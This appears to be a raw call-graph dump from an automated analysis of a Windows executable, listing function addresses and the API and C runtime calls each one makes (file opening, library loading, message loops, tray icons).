101789 5e84c0 101549->101789 101553 61d1c3 101551->101553 101552 5e381a Mailbox 101554 5e7de1 59 API calls 101552->101554 101555 5e3ed0 59 API calls 101553->101555 101556 5e3840 101554->101556 101558 61d1df 101555->101558 101557 5e84c0 69 API calls 101556->101557 101560 5e384f Mailbox 101557->101560 101559 5e4706 61 API calls 101558->101559 101561 61d204 101559->101561 101564 5e7667 59 API calls 101560->101564 101562 5e3ed0 59 API calls 101561->101562 101563 61d210 101562->101563 101565 5e8047 59 API calls 101563->101565 101566 5e386d 101564->101566 101567 61d21e 101565->101567 101793 5e3ed0 101566->101793 101569 5e3ed0 59 API calls 101567->101569 101571 61d22d 101569->101571 101577 5e8047 59 API calls 101571->101577 101573 5e3887 101573->101547 101574 5e3891 101573->101574 101575 602efd _W_store_winword 60 API calls 101574->101575 101576 5e389c 101575->101576 101576->101553 101578 5e38a6 101576->101578 101579 61d24f 101577->101579 101580 602efd _W_store_winword 60 API calls 101578->101580 101581 5e3ed0 59 API calls 101579->101581 101582 5e38b1 101580->101582 101583 61d25c 101581->101583 101582->101558 101584 5e38bb 101582->101584 101583->101583 101585 602efd _W_store_winword 60 API calls 101584->101585 101586 5e38c6 101585->101586 101586->101571 101587 5e3907 101586->101587 101589 5e3ed0 59 API calls 101586->101589 101587->101571 101588 5e3914 101587->101588 101809 5e92ce 101588->101809 101590 5e38ea 101589->101590 101592 5e8047 59 API calls 101590->101592 101594 5e38f8 101592->101594 101596 5e3ed0 59 API calls 101594->101596 101596->101587 101599 5e928a 59 API calls 101601 5e394f 101599->101601 101600 5e8ee0 60 API calls 101600->101601 101601->101599 101601->101600 101602 5e3ed0 59 API calls 101601->101602 101603 5e3995 Mailbox 101601->101603 101602->101601 101603->101473 101605 5e7292 __ftell_nolock 101604->101605 101606 61ea22 _memset 101605->101606 101607 5e72ab 101605->101607 101610 61ea3e GetOpenFileNameW 101606->101610 101608 5e4750 60 API calls 101607->101608 101609 5e72b4 101608->101609 102719 600791 101609->102719 101612 61ea8d 101610->101612 101613 5e7bcc 59 API calls 101612->101613 101615 61eaa2 101613->101615 101615->101615 101617 5e72c9 102737 5e686a 101617->102737 101621 5f093a __ftell_nolock 101620->101621 102979 5e6d80 101621->102979 101623 5f093f 101635 5e3c14 101623->101635 102990 5f119e 89 API calls 101623->102990 101625 5f094c 101625->101635 102991 5f3ee7 91 API calls Mailbox 101625->102991 101627 5f0955 101628 5f0959 GetFullPathNameW 101627->101628 101627->101635 101629 5e7bcc 59 API calls 101628->101629 101630 5f0985 101629->101630 101631 5e7bcc 59 API calls 101630->101631 101632 5f0992 101631->101632 101633 624cab _wcscat 101632->101633 101634 5e7bcc 59 API calls 101632->101634 101634->101635 101635->101483 101635->101491 101637 61d261 101636->101637 101638 5e3ab0 LoadImageW RegisterClassExW 101636->101638 103034 5e47a0 LoadImageW EnumResourceNamesW 101637->103034 103033 5e3041 7 API calls 101638->103033 101641 5e3b34 101643 5e39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101641->101643 101642 61d26a 101643->101499 101645 5e4375 _memset 101644->101645 103035 5e4182 101645->103035 101648 5e43fa 101650 5e4414 Shell_NotifyIconW 101648->101650 101651 5e4430 Shell_NotifyIconW 101648->101651 101656 624cc3 101655->101656 101670 5f09f5 101655->101670 103201 649e4a 89 API calls 4 library calls 101656->103201 101658 5f0cfa 101658->101506 101662 5f0a4b PeekMessageW 101721 5f0a05 Mailbox 101662->101721 101667 624e81 Sleep 101667->101721 101669 5f0ce4 101669->101658 103198 5f1070 10 API calls Mailbox 101669->103198 101670->101721 103202 5e9e5d 60 API calls 101670->103202 103203 636349 331 API calls 101670->103203 101674 624d50 TranslateAcceleratorW 101676 5f0e43 PeekMessageW 101674->101676 101674->101721 101675 5f0ea5 TranslateMessage DispatchMessageW 101675->101676 101676->101721 101677 600db6 59 API calls Mailbox 101677->101721 101678 5f0d13 timeGetTime 101678->101721 101679 62581f WaitForSingleObject 101681 62583c GetExitCodeProcess CloseHandle 101679->101681 101679->101721 101715 5f0f95 101681->101715 101682 5f0e5f Sleep 101717 5f0e70 Mailbox 101682->101717 101683 5e8047 59 API calls 101683->101721 101684 5e7667 59 API calls 101684->101717 101685 625af8 Sleep 101685->101717 101687 5eb73c 304 API calls 101687->101721 101689 60049f timeGetTime 101689->101717 101690 5f0f4e timeGetTime 103200 5e9e5d 60 API calls 101690->103200 101694 625b8f GetExitCodeProcess 101697 665f25 110 API calls 101697->101717 101698 5eb7dd 109 API calls 101698->101717 101701 5e9e5d 60 API calls 101701->101721 101702 625874 101702->101715 101703 625c17 Sleep 101703->101721 101704 625078 Sleep 101704->101721 101706 5e7de1 59 API calls 101706->101717 101711 5e9ea0 304 API calls 101711->101721 101715->101506 101717->101684 101717->101689 101717->101694 101717->101697 101717->101698 101717->101702 101717->101703 101717->101704 101717->101706 101717->101715 101717->101721 103238 642408 60 API calls 101717->103238 103239 5e9e5d 60 API calls 101717->103239 103240 5e89b3 69 API calls Mailbox 101717->103240 103241 5eb73c 331 API calls 101717->103241 103242 6364da 60 API calls 101717->103242 103243 645244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101717->103243 103244 643c55 66 API calls Mailbox 101717->103244 101719 649e4a 89 API calls 101719->101721 101720 5e9c90 59 API calls Mailbox 101720->101721 101721->101662 101721->101667 101721->101669 101721->101674 101721->101675 101721->101676 101721->101677 101721->101678 101721->101679 101721->101682 101721->101683 101721->101685 101721->101687 101721->101690 101721->101701 101721->101711 101721->101715 101721->101717 101721->101719 101721->101720 101722 5e84c0 69 API calls 101721->101722 101724 63617e 59 API calls Mailbox 101721->101724 101725 5e7de1 59 API calls 101721->101725 101726 5e89b3 69 API calls 101721->101726 101727 6255d5 VariantClear 101721->101727 101728 62566b VariantClear 101721->101728 101729 625419 VariantClear 101721->101729 101730 636e8f 59 API calls 101721->101730 101731 5e8cd4 59 API calls Mailbox 101721->101731 103062 5ee6a0 101721->103062 103093 5ef460 101721->103093 103112 5e31ce 101721->103112 103117 5ee420 331 API calls 101721->103117 103118 5efce0 101721->103118 103204 666018 59 API calls 101721->103204 103205 649a15 59 API calls Mailbox 101721->103205 103206 63d4f2 59 API calls 101721->103206 103207 5e9837 101721->103207 103225 6360ef 59 API calls 2 library calls 101721->103225 103226 5e8401 59 API calls 101721->103226 103227 5e82df 101721->103227 101722->101721 101724->101721 101725->101721 101726->101721 101727->101721 101728->101721 101729->101721 101730->101721 101731->101721 101733->101483 101734->101496 101736 61ec6b 101735->101736 101737 5e7b40 101735->101737 101745 5e3d3e __ftell_nolock 101744->101745 101746 5e7bcc 59 API calls 101745->101746 101752 5e3ea4 Mailbox 101745->101752 101748 5e3d70 101746->101748 101757 5e3da6 Mailbox 101748->101757 101870 5e79f2 101748->101870 101749 5e79f2 59 API calls 101749->101757 101750 5e3e77 101751 5e7de1 59 API calls 101750->101751 101750->101752 101754 5e3e98 101751->101754 101752->101527 101753 5e7de1 59 API calls 101753->101757 101755 5e3f74 59 API calls 101754->101755 101755->101752 101756 5e3f74 59 API calls 101756->101757 101757->101749 101757->101750 101757->101752 101757->101753 101757->101756 101873 5e4bb5 101758->101873 101763 5e4e08 LoadLibraryExW 101883 5e4b6a 101763->101883 101764 61d8e6 101766 5e4e4a 84 API calls 101764->101766 101767 61d8ed 101766->101767 101769 5e4b6a 3 API calls 101767->101769 101773 61d8f5 101769->101773 101771 5e4e2f 101772 5e4e3b 101771->101772 101771->101773 101775 5e4e4a 84 API calls 101772->101775 101909 5e4f0b 101773->101909 101777 5e37d4 101775->101777 101777->101534 101777->101535 101779 61d91c 101917 5e4ec7 101779->101917 101781 61d929 101783 5e37ef 101782->101783 101784 5e8052 101782->101784 101786 5e928a 101783->101786 102344 5e7f77 59 API calls 2 library calls 101784->102344 101787 600db6 Mailbox 59 API calls 101786->101787 101788 5e37fb 101787->101788 101788->101548 101790 5e84cb 101789->101790 101792 5e84f2 101790->101792 102345 5e89b3 69 API calls Mailbox 101790->102345 101792->101552 101794 5e3eda 101793->101794 101795 5e3ef3 101793->101795 101796 5e8047 59 API calls 101794->101796 101797 5e7bcc 59 API calls 101795->101797 101798 5e3879 101796->101798 101797->101798 101799 602efd 101798->101799 101800 602f09 101799->101800 101801 602f7e 101799->101801 101805 602f2e 101800->101805 102346 608b28 58 API calls __getptd_noexit 101800->102346 102348 602f90 60 API calls 3 library calls 101801->102348 101804 602f8b 101804->101573 101805->101573 101806 602f15 102347 608db6 9 API calls __write 101806->102347 101808 602f20 101808->101573 101810 5e92d6 101809->101810 101811 600db6 Mailbox 59 API calls 101810->101811 101812 5e92e4 101811->101812 101813 5e3924 101812->101813 102349 5e91fc 59 API calls Mailbox 101812->102349 101815 5e9050 101813->101815 102350 5e9160 101815->102350 101817 600db6 Mailbox 59 API calls 101819 5e3932 101817->101819 101818 5e905f 101818->101817 101818->101819 101820 5e8ee0 101819->101820 101821 61f17c 101820->101821 101825 5e8ef7 101820->101825 101821->101825 102377 5e8bdb 59 API calls Mailbox 101821->102377 101823 5e8ff8 101826 600db6 Mailbox 59 API calls 101823->101826 101824 5e9040 102364 5e9d3c 101824->102364 101825->101823 101825->101824 101828 5e8fff 101825->101828 101826->101828 101828->101601 101830 5e4ee5 85 API calls 101829->101830 101831 6495ca 101830->101831 102380 649734 101831->102380 101834 5e4f0b 74 API calls 101835 6495f7 101834->101835 101836 5e4f0b 74 API calls 101835->101836 101837 649607 101836->101837 101838 5e4f0b 74 API calls 101837->101838 101839 649622 101838->101839 101840 5e4f0b 74 API calls 101839->101840 101841 64963d 101840->101841 101842 5e4ee5 85 API calls 101841->101842 101843 649654 101842->101843 101844 60571c __malloc_crt 58 API calls 101843->101844 101845 64965b 101844->101845 101846 60571c __malloc_crt 58 API calls 101845->101846 101847 649665 101846->101847 101848 5e4f0b 74 API calls 101847->101848 101849 649679 101848->101849 101850 649109 GetSystemTimeAsFileTime 101849->101850 101851 64968c 101850->101851 101852 6496b6 101851->101852 101853 6496a1 101851->101853 101855 6496bc 101852->101855 101856 64971b 101852->101856 101854 602d55 _free 58 API calls 101853->101854 101857 6496a7 101854->101857 102386 648b06 101855->102386 101859 602d55 _free 58 API calls 101856->101859 101860 602d55 _free 58 API calls 101857->101860 101862 61d186 101859->101862 101860->101862 101862->101539 101864 5e4e4a 101862->101864 101863 602d55 _free 58 API calls 101863->101862 101865 5e4e54 101864->101865 101867 5e4e5b 101864->101867 101866 6053a6 __fcloseall 83 API calls 101865->101866 101866->101867 101868 5e4e6a 101867->101868 101869 5e4e7b FreeLibrary 101867->101869 101868->101539 101869->101868 101871 5e7e4f 59 API calls 101870->101871 101872 5e79fd 101871->101872 101872->101748 101922 5e4c03 101873->101922 101876 5e4bdc 101878 5e4bec FreeLibrary 101876->101878 101879 5e4bf5 101876->101879 101877 5e4c03 2 API calls 101877->101876 101878->101879 101880 60525b 101879->101880 101926 605270 101880->101926 101882 5e4dfc 101882->101763 101882->101764 102084 5e4c36 101883->102084 101886 5e4b8f 101888 5e4baa 101886->101888 101889 5e4ba1 FreeLibrary 101886->101889 101887 5e4c36 2 API calls 101887->101886 101890 5e4c70 101888->101890 101889->101888 101891 600db6 Mailbox 59 API calls 101890->101891 101892 5e4c85 101891->101892 101893 5e522e 59 API calls 101892->101893 101894 5e4c91 _memmove 101893->101894 101895 5e4d89 101894->101895 101896 5e4dc1 101894->101896 101900 5e4ccc 101894->101900 102088 5e4e89 CreateStreamOnHGlobal 101895->102088 102099 64991b 95 API calls 101896->102099 101897 5e4ec7 69 API calls 101906 5e4cd5 101897->101906 101900->101897 101901 5e4f0b 74 API calls 101901->101906 101903 5e4d69 101903->101771 101904 61d8a7 101905 5e4ee5 85 API calls 101904->101905 101907 61d8bb 101905->101907 101906->101901 101906->101903 101906->101904 102094 5e4ee5 101906->102094 101908 5e4f0b 74 API calls 101907->101908 101908->101903 101910 5e4f1d 101909->101910 101911 61d9cd 101909->101911 102123 6055e2 101910->102123 101914 649109 102321 648f5f 101914->102321 101916 64911f 101916->101779 101918 61d990 101917->101918 101919 5e4ed6 101917->101919 102326 605c60 101919->102326 101921 5e4ede 101921->101781 101923 5e4bd0 101922->101923 101924 5e4c0c LoadLibraryA 101922->101924 101923->101876 101923->101877 101924->101923 101925 5e4c1d GetProcAddress 101924->101925 101925->101923 101929 60527c __write 101926->101929 101927 60528f 101975 608b28 58 API calls __getptd_noexit 101927->101975 101929->101927 101931 6052c0 101929->101931 101930 605294 101976 608db6 9 API calls __write 101930->101976 101945 6104e8 101931->101945 101934 6052c5 101935 6052db 101934->101935 101936 6052ce 101934->101936 101938 605305 101935->101938 101939 6052e5 101935->101939 101977 608b28 58 API calls __getptd_noexit 101936->101977 101960 610607 101938->101960 101978 608b28 58 API calls __getptd_noexit 101939->101978 101942 60529f __write @_EH4_CallFilterFunc@8 101942->101882 101946 6104f4 __write 101945->101946 101947 609c0b __lock 58 API calls 101946->101947 101953 610502 101947->101953 101948 61057d 101985 60881d 58 API calls 2 library calls 101948->101985 101951 6105f3 __write 101951->101934 101952 610584 101958 610576 101952->101958 101986 609e2b InitializeCriticalSectionAndSpinCount 101952->101986 101953->101948 101954 609c93 __mtinitlocknum 58 API calls 101953->101954 101953->101958 101983 606c50 59 API calls __lock 101953->101983 101984 606cba LeaveCriticalSection LeaveCriticalSection _doexit 101953->101984 101954->101953 101957 6105aa EnterCriticalSection 101957->101958 101980 6105fe 101958->101980 101969 610627 __wopenfile 101960->101969 101961 610641 101991 608b28 58 API calls __getptd_noexit 101961->101991 101963 6107fc 101963->101961 101967 61085f 101963->101967 101964 610646 101992 608db6 9 API calls __write 101964->101992 101966 605310 101979 605332 LeaveCriticalSection LeaveCriticalSection __wfsopen 101966->101979 101988 6185a1 101967->101988 101969->101961 101969->101963 101969->101969 101993 6037cb 60 API calls 2 library calls 101969->101993 101971 6107f5 101971->101963 101994 6037cb 60 API calls 2 library calls 101971->101994 101973 610814 101973->101963 101995 6037cb 60 API calls 2 library calls 101973->101995 101975->101930 101976->101942 101977->101942 101978->101942 101979->101942 101987 609d75 LeaveCriticalSection 101980->101987 101982 610605 101982->101951 101983->101953 101984->101953 101985->101952 101986->101957 101987->101982 101996 617d85 101988->101996 101990 6185ba 101990->101966 101991->101964 101992->101966 101993->101971 101994->101973 101995->101963 101997 617d91 __write 101996->101997 101998 617da7 101997->101998 102000 617ddd 101997->102000 102081 608b28 58 API calls __getptd_noexit 101998->102081 102007 617e4e 102000->102007 102001 617dac 102082 608db6 9 API calls __write 102001->102082 102004 617df9 102083 617e22 LeaveCriticalSection __unlock_fhandle 102004->102083 102006 617db6 __write 102006->101990 102008 617e6e 102007->102008 102009 6044ea __wsopen_nolock 58 API calls 102008->102009 102012 617e8a 102009->102012 102010 608dc6 __invoke_watson 8 API calls 102011 6185a0 102010->102011 102014 617d85 __wsopen_helper 103 API calls 102011->102014 102013 617ec4 102012->102013 102020 617ee7 102012->102020 102056 617fc1 102012->102056 102015 608af4 __write 58 API calls 102013->102015 102016 6185ba 102014->102016 102017 617ec9 102015->102017 102016->102004 102018 608b28 __write 58 API calls 102017->102018 102019 617ed6 102018->102019 102022 608db6 __write 9 API calls 102019->102022 102021 617fa5 102020->102021 102028 617f83 102020->102028 102023 608af4 __write 58 API calls 102021->102023 102049 617ee0 102022->102049 102024 617faa 102023->102024 102025 608b28 __write 58 API calls 102024->102025 102026 617fb7 102025->102026 102027 608db6 __write 9 API calls 102026->102027 102027->102056 102029 60d294 __alloc_osfhnd 61 API calls 102028->102029 102030 618051 102029->102030 102031 61805b 102030->102031 102032 61807e 102030->102032 102034 608af4 __write 58 API calls 102031->102034 102033 617cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102032->102033 102042 6180a0 102033->102042 102035 618060 102034->102035 102037 608b28 __write 58 API calls 102035->102037 102036 61811e GetFileType 102040 618129 GetLastError 102036->102040 102041 61816b 102036->102041 102039 61806a 102037->102039 102038 6180ec GetLastError 102043 608b07 __dosmaperr 58 API calls 102038->102043 102044 608b28 __write 58 API calls 102039->102044 102045 608b07 __dosmaperr 58 API calls 102040->102045 102052 60d52a __set_osfhnd 59 API calls 102041->102052 102042->102036 102042->102038 102047 617cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102042->102047 102048 618111 102043->102048 102044->102049 102046 618150 CloseHandle 102045->102046 102046->102048 102050 61815e 102046->102050 102051 6180e1 102047->102051 102054 608b28 __write 58 API calls 102048->102054 102049->102004 102053 608b28 __write 58 API calls 102050->102053 102051->102036 102051->102038 102058 618189 102052->102058 102055 618163 102053->102055 102054->102056 102055->102048 102056->102010 102057 618344 102057->102056 102060 618517 CloseHandle 102057->102060 102058->102057 102059 6118c1 __lseeki64_nolock 60 API calls 102058->102059 102068 61820a 102058->102068 102061 6181f3 102059->102061 102062 617cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102060->102062 102063 608af4 __write 58 API calls 102061->102063 102061->102068 102064 61853e 102062->102064 102063->102068 102065 618546 GetLastError 102064->102065 102066 618572 102064->102066 102067 608b07 __dosmaperr 58 API calls 102065->102067 102066->102056 102069 618552 102067->102069 102068->102057 102070 610add __close_nolock 61 API calls 102068->102070 102071 610e5b 70 API calls __read_nolock 102068->102071 102072 61823c 102068->102072 102075 60d886 __write 78 API calls 102068->102075 102076 6183c1 102068->102076 102079 6118c1 60 API calls __lseeki64_nolock 102068->102079 102073 60d43d __free_osfhnd 59 API calls 102069->102073 102070->102068 102071->102068 102072->102068 102074 6197a2 __chsize_nolock 82 API calls 102072->102074 102073->102066 102074->102072 102075->102068 102077 610add __close_nolock 61 API calls 102076->102077 102078 6183c8 102077->102078 102080 608b28 __write 58 API calls 102078->102080 102079->102068 102080->102056 102081->102001 102082->102006 102083->102006 102085 5e4b83 102084->102085 102086 5e4c3f LoadLibraryA 102084->102086 102085->101886 102085->101887 102086->102085 102087 5e4c50 GetProcAddress 102086->102087 102087->102085 102089 5e4ea3 FindResourceExW 102088->102089 102093 5e4ec0 102088->102093 102090 61d933 LoadResource 102089->102090 102089->102093 102091 61d948 SizeofResource 102090->102091 102090->102093 102092 61d95c LockResource 102091->102092 102091->102093 102092->102093 102093->101900 102095 5e4ef4 102094->102095 102098 61d9ab 102094->102098 102100 60584d 102095->102100 102097 5e4f02 102097->101906 102099->101900 102101 605859 __write 102100->102101 102102 60586b 102101->102102 102104 605891 102101->102104 102113 608b28 58 API calls __getptd_noexit 102102->102113 102115 606c11 102104->102115 102105 605870 102114 608db6 9 API calls __write 102105->102114 102108 605897 102121 6057be 83 API calls 4 library calls 102108->102121 102110 6058a6 102122 6058c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102110->102122 102112 60587b __write 102112->102097 102113->102105 102114->102112 102116 606c21 102115->102116 102117 606c43 EnterCriticalSection 102115->102117 102116->102117 102118 606c29 102116->102118 102119 606c39 102117->102119 102120 609c0b __lock 58 API calls 102118->102120 102119->102108 102120->102119 102121->102110 102122->102112 102126 6055fd 102123->102126 102125 5e4f2e 102125->101914 102127 605609 __write 102126->102127 102128 60564c 102127->102128 102129 605644 __write 102127->102129 102134 60561f _memset 102127->102134 102130 606c11 __lock_file 59 API calls 102128->102130 102129->102125 102131 605652 102130->102131 102139 60541d 102131->102139 102153 608b28 58 API calls __getptd_noexit 102134->102153 102135 605639 102154 608db6 9 API calls __write 102135->102154 102140 605453 102139->102140 102143 605438 _memset 102139->102143 102155 605686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102140->102155 102141 605443 102251 608b28 58 API calls __getptd_noexit 102141->102251 102143->102140 102143->102141 102147 605493 102143->102147 102146 6055a4 _memset 102254 608b28 58 API calls __getptd_noexit 102146->102254 102147->102140 102147->102146 102156 6046e6 102147->102156 102163 610e5b 102147->102163 102231 610ba7 102147->102231 102253 610cc8 58 API calls 3 library calls 102147->102253 102151 605448 102252 608db6 9 API calls __write 102151->102252 102153->102135 102154->102129 102155->102129 102157 6046f0 102156->102157 102158 604705 102156->102158 102255 608b28 58 API calls __getptd_noexit 102157->102255 102158->102147 102160 6046f5 102256 608db6 9 API calls __write 102160->102256 102162 604700 102162->102147 102164 610e93 102163->102164 102165 610e7c 102163->102165 102166 6115cb 102164->102166 102170 610ecd 102164->102170 102266 608af4 58 API calls __getptd_noexit 102165->102266 102282 608af4 58 API calls __getptd_noexit 102166->102282 102169 610e81 102267 608b28 58 API calls __getptd_noexit 102169->102267 102173 610ed5 102170->102173 102180 610eec 102170->102180 102171 6115d0 102283 608b28 58 API calls __getptd_noexit 102171->102283 102268 608af4 58 API calls __getptd_noexit 102173->102268 102176 610ee1 102284 608db6 9 API calls __write 102176->102284 102177 610eda 102269 608b28 58 API calls __getptd_noexit 102177->102269 102179 610f01 102270 608af4 58 API calls __getptd_noexit 102179->102270 102180->102179 102181 610f1b 102180->102181 102184 610f39 102180->102184 102211 610e88 102180->102211 102181->102179 102186 610f26 102181->102186 102271 60881d 58 API calls 2 library calls 102184->102271 102257 615c6b 102186->102257 102187 610f49 102189 610f51 102187->102189 102190 610f6c 102187->102190 102272 608b28 58 API calls __getptd_noexit 102189->102272 102274 6118c1 60 API calls 3 library calls 102190->102274 102191 61103a 102192 6110b3 ReadFile 102191->102192 102195 611050 GetConsoleMode 102191->102195 102196 611593 GetLastError 102192->102196 102197 6110d5 102192->102197 102199 6110b0 102195->102199 102200 611064 102195->102200 102201 6115a0 102196->102201 102202 611093 102196->102202 102197->102196 102206 6110a5 102197->102206 102198 610f56 102273 608af4 58 API calls __getptd_noexit 102198->102273 102199->102192 102200->102199 102204 61106a ReadConsoleW 102200->102204 102280 608b28 58 API calls __getptd_noexit 102201->102280 102213 611099 102202->102213 102275 608b07 58 API calls 2 library calls 102202->102275 102204->102206 102208 61108d GetLastError 102204->102208 102206->102213 102214 61110a 102206->102214 102217 611377 102206->102217 102207 6115a5 102281 608af4 58 API calls __getptd_noexit 102207->102281 102208->102202 102211->102147 102212 602d55 _free 58 API calls 102212->102211 102213->102211 102213->102212 102216 611176 ReadFile 102214->102216 102224 6111f7 102214->102224 102219 611197 GetLastError 102216->102219 102226 6111a1 102216->102226 102217->102213 102218 61147d ReadFile 102217->102218 102223 6114a0 GetLastError 102218->102223 102227 6114ae 102218->102227 102219->102226 102220 6112b4 102225 611264 MultiByteToWideChar 102220->102225 102278 6118c1 60 API calls 3 library calls 102220->102278 102221 6112a4 102277 608b28 58 API calls __getptd_noexit 102221->102277 102223->102227 102224->102213 102224->102220 102224->102221 102224->102225 102225->102208 102225->102213 102226->102214 102276 6118c1 60 API calls 3 library calls 102226->102276 102227->102217 102279 6118c1 60 API calls 3 library calls 102227->102279 102232 610bb2 102231->102232 102237 610bc7 102231->102237 102318 608b28 58 API calls __getptd_noexit 102232->102318 102234 610bc2 102234->102147 102235 610bb7 102319 608db6 9 API calls __write 102235->102319 102237->102234 102238 610bfc 102237->102238 102320 615fe4 58 API calls __malloc_crt 102237->102320 102240 6046e6 __fflush_nolock 58 API calls 102238->102240 102241 610c10 102240->102241 102285 610d47 102241->102285 102243 610c17 102243->102234 102244 6046e6 __fflush_nolock 58 API calls 102243->102244 102245 610c3a 102244->102245 102245->102234 102246 6046e6 __fflush_nolock 58 API calls 102245->102246 102247 610c46 102246->102247 102247->102234 102248 6046e6 __fflush_nolock 58 API calls 102247->102248 102249 610c53 102248->102249 102250 6046e6 __fflush_nolock 58 API calls 102249->102250 102250->102234 102251->102151 102252->102140 102253->102147 102254->102151 102255->102160 102256->102162 102258 615c76 102257->102258 102260 615c83 102257->102260 102259 608b28 __write 58 API calls 102258->102259 102261 615c7b 102259->102261 102262 615c8f 102260->102262 102263 608b28 __write 58 API calls 102260->102263 102261->102191 102262->102191 102264 615cb0 102263->102264 102265 608db6 __write 9 API calls 102264->102265 102265->102261 102266->102169 102267->102211 102268->102177 102269->102176 102270->102177 102271->102187 102272->102198 102273->102211 102274->102186 102275->102213 102276->102226 102277->102213 102278->102225 102279->102227 102280->102207 102281->102213 102282->102171 102283->102176 102284->102211 102286 610d53 __write 102285->102286 102287 610d60 102286->102287 102288 610d77 102286->102288 102290 608af4 __write 58 API calls 102287->102290 102289 610e3b 102288->102289 102292 610d8b 102288->102292 102293 608af4 __write 58 API calls 102289->102293 102291 610d65 102290->102291 102294 608b28 __write 58 API calls 102291->102294 102295 610db6 102292->102295 102296 610da9 102292->102296 102297 610dae 102293->102297 102309 610d6c __write 102294->102309 102299 610dc3 102295->102299 102300 610dd8 102295->102300 102298 608af4 __write 58 API calls 102296->102298 102302 608b28 __write 58 API calls 102297->102302 102298->102297 102303 608af4 __write 58 API calls 102299->102303 102301 60d206 ___lock_fhandle 59 API calls 102300->102301 102304 610dde 102301->102304 102305 610dd0 102302->102305 102306 610dc8 102303->102306 102307 610df1 102304->102307 102308 610e04 102304->102308 102312 608db6 __write 9 API calls 102305->102312 102310 608b28 __write 58 API calls 102306->102310 102311 610e5b __read_nolock 70 API calls 102307->102311 102313 608b28 __write 58 API calls 102308->102313 102309->102243 102310->102305 102314 610dfd 102311->102314 102312->102309 102315 610e09 102313->102315 102317 610e33 __read LeaveCriticalSection 102314->102317 102316 608af4 __write 58 API calls 102315->102316 102316->102314 102317->102309 102318->102235 102319->102234 102320->102238 102324 60520a GetSystemTimeAsFileTime 102321->102324 102323 648f6e 102323->101916 102325 605238 __aulldiv 102324->102325 102325->102323 102327 605c6c __write 102326->102327 102328 605c93 102327->102328 102329 605c7e 102327->102329 102331 606c11 __lock_file 59 API calls 102328->102331 102340 608b28 58 API calls __getptd_noexit 102329->102340 102333 605c99 102331->102333 102332 605c83 102341 608db6 9 API calls __write 102332->102341 102342 6058d0 67 API calls 5 library calls 102333->102342 102336 605ca4 102343 605cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102336->102343 102338 605cb6 102339 605c8e __write 102338->102339 102339->101921 102340->102332 102341->102339 102342->102336 102343->102338 102344->101783 102345->101792 102346->101806 102347->101808 102348->101804 102349->101813 102351 5e9169 Mailbox 102350->102351 102352 61f19f 102351->102352 102357 5e9173 102351->102357 102353 600db6 Mailbox 59 API calls 102352->102353 102354 61f1ab 102353->102354 102355 5e917a 102355->101818 102357->102355 102358 5e9c90 102357->102358 102360 5e9c9b 102358->102360 102359 5e9cd2 102359->102357 102360->102359 102363 5e8cd4 59 API calls Mailbox 102360->102363 102362 5e9cfd 102362->102357 102363->102362 102365 5e9d4a 102364->102365 102375 5e9d78 Mailbox 102364->102375 102366 5e9d9d 102365->102366 102371 5e9d50 Mailbox 102365->102371 102368 5e8047 59 API calls 102366->102368 102367 5e9d64 102369 5e9d6f 102367->102369 102370 5e9dcc 102367->102370 102367->102375 102368->102375 102374 61f9e6 VariantClear 102369->102374 102369->102375 102370->102375 102378 5e8cd4 59 API calls Mailbox 102370->102378 102371->102367 102372 61fa0f 102371->102372 102372->102375 102379 636e8f 59 API calls 102372->102379 102374->102375 102375->101828 102377->101825 102378->102375 102379->102375 102382 649748 __tzset_nolock _wcscmp 102380->102382 102381 649109 GetSystemTimeAsFileTime 102381->102382 102382->102381 102383 5e4f0b 74 API calls 102382->102383 102384 6495dc 102382->102384 102385 5e4ee5 85 API calls 102382->102385 102383->102382 102384->101834 102384->101862 102385->102382 102387 648b1f 102386->102387 102388 648b11 102386->102388 102390 648b64 102387->102390 102391 60525b 115 API calls 102387->102391 102402 648b28 102387->102402 102389 60525b 115 API calls 102388->102389 102389->102387 102417 648d91 102390->102417 102392 648b49 102391->102392 102392->102390 102394 648b52 102392->102394 102398 6053a6 __fcloseall 83 API calls 102394->102398 102394->102402 102395 648ba8 102396 648bac 102395->102396 102397 648bcd 102395->102397 102400 648bb9 102396->102400 102401 6053a6 __fcloseall 83 API calls 102396->102401 102421 6489a9 102397->102421 102398->102402 102400->102402 102404 6053a6 __fcloseall 83 API calls 102400->102404 102401->102400 102402->101863 102404->102402 102405 648bfb 102430 648c2b 102405->102430 102406 648bdb 102408 648be8 102406->102408 102410 6053a6 __fcloseall 83 API calls 102406->102410 102408->102402 102411 6053a6 __fcloseall 83 API calls 102408->102411 102410->102408 102411->102402 102414 648c16 102414->102402 102416 6053a6 __fcloseall 83 API calls 102414->102416 102416->102402 102418 648db6 102417->102418 102420 648d9f __tzset_nolock _memmove 102417->102420 102419 6055e2 __fread_nolock 74 API calls 102418->102419 102419->102420 102420->102395 102422 60571c __malloc_crt 58 API calls 102421->102422 102423 6489b8 102422->102423 102424 60571c __malloc_crt 58 API calls 102423->102424 102425 6489cc 102424->102425 102426 60571c __malloc_crt 58 API calls 102425->102426 102427 6489e0 102426->102427 102428 648d0d 58 API calls 102427->102428 102429 6489f3 102427->102429 102428->102429 102429->102405 102429->102406 102437 648c40 102430->102437 102431 648cf8 102474 648f35 102431->102474 102432 648a05 74 API calls 102432->102437 102434 648c02 102438 648d0d 102434->102438 102437->102431 102437->102432 102437->102434 102459 648aa1 102437->102459 102470 648e12 102437->102470 102439 648d1a 102438->102439 102442 648d20 102438->102442 102440 602d55 _free 58 API calls 102439->102440 102440->102442 102441 602d55 _free 58 API calls 102443 648d31 102441->102443 102442->102441 102442->102443 102444 602d55 _free 58 API calls 102443->102444 102445 648c09 102443->102445 102444->102445 102445->102414 102446 6053a6 102445->102446 102447 6053b2 __write 102446->102447 102448 6053c6 102447->102448 102449 6053de 102447->102449 102530 608b28 58 API calls __getptd_noexit 102448->102530 102451 606c11 __lock_file 59 API calls 102449->102451 102455 6053d6 __write 102449->102455 102453 6053f0 102451->102453 102452 6053cb 102531 608db6 9 API calls __write 102452->102531 102514 60533a 102453->102514 102455->102414 102478 648a05 102459->102478 102462 648afd 102462->102437 102463 648a05 74 API calls 102464 648abd 102463->102464 102464->102462 102465 648a05 74 API calls 102464->102465 102466 648ace 